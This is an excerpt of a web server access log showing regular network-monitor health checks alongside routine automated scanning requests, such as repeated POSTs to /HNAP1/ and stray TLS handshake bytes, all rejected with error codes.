212.91.246.72 - - [01/Nov/2022:15:41:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:42:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:15:42:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:15:42:47 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:15:43:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:44:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:15:44:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:15:44:47 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
157.245.13.0 - - [01/Nov/2022:15:44:52 +0100] "\x8e#\xf8" 501 318 "-" "-"
157.245.13.0 - - [01/Nov/2022:15:44:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
157.245.13.0 - - [01/Nov/2022:15:44:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
157.245.13.0 - - [01/Nov/2022:15:44:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Nov/2022:15:45:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.206.243.220 - - [01/Nov/2022:15:46:17 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
212.91.246.72 - - [01/Nov/2022:15:46:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:15:47:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:15:48:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:15:48:18 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:15:48:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:15:49:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:15:49:27 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [01/Nov/2022:15:49:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:15:49:39 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:15:49:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
